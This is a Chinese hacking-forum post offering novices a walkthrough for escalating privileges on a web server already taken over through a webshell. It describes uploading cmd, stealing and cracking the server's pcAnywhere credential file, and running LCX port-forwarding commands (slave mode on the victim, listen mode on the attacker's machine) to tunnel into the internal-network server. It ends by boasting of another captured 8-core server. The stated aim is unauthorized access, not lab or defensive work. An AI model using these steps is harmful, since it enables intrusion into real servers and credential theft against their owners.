|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
+ q. }! \/ a |( J p6 Z1 V9 y/ P2 ^3 Z9 b
提权方法:pcanywhere+LCX6 h5 B; l, b/ \
0 x0 h* G2 f7 [( ]0 o6 [* c获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
7 a* e* g# B* J% v9 j- ^7 ?7 H0 V3 Q: y" c- @
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
1 q4 L5 ^5 R% O& @2 S8 B0 u/ h6 P* r# R, g
" O1 y5 S( c4 k5 F% p, u. v9 q
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
7 ^) q$ r1 K- q8 Y2 P3 x; j; R. ]
! i' s. O+ N0 x5 J- W( X1 K; O% ^. j. O0 ~, r; c
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。 z3 i4 e; i7 p* N5 @. E; s2 Z/ q
% Z* z6 R2 Z- E8 i% L+ s2 Q0 I% d6 x* ]. q
: R* q% W, z6 `' W: m s
! f& b5 P/ W; t9 U9 V
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
% r h( h& \' n: \; ~+ s: A* b% ?0 G& H& h# Z
2 C# a( |6 ?0 a& A3 n" kLCX的用法再简单说下:& Y3 D# b* V9 E2 \
# @; E& {3 O/ c+ P. l1 v
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)% B; |/ a4 C" W& ?! I
( }. Q8 A$ `+ c2 @% d7 y
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)& z7 f1 c! J7 C4 F/ l
0 S6 c G6 M* R
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。0 ]) G) h( r x2 t' k1 I
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
7 {( o" M, ]/ v4 L( u$ z+ K
* O; N3 S" Z1 R2 X4 f" _2 R/ a; X9 C
; A& ~- L; Q7 t! U3 {# z
5 S& V. C5 J7 p6 Y6 l
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
& X: }& E$ o% K; |4 a6 u2 W) ]5 i+ z, X: W$ z2 ^
: | J; m$ E2 Q- M5 c1 Y2 z/ Z! A+ O( C, I w( j: s
# i3 [/ s9 m: I
我们本地连接试试,输入我们刚破解的账号密码) e% O- k' t3 J+ ^6 A1 k( i
7 i1 C/ U$ T1 i2 Z
+ R0 a( {& x% K% K* I: p
呵呵``连接成功,服务器不错,又一个8核^︵^
8 S9 h& D z0 t* F
/ e4 v) g/ H! }, `9 g/ h0 G1 G: s# s4 y' J. O8 m4 P0 ?" o; n
. Y) h( y" @3 o |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
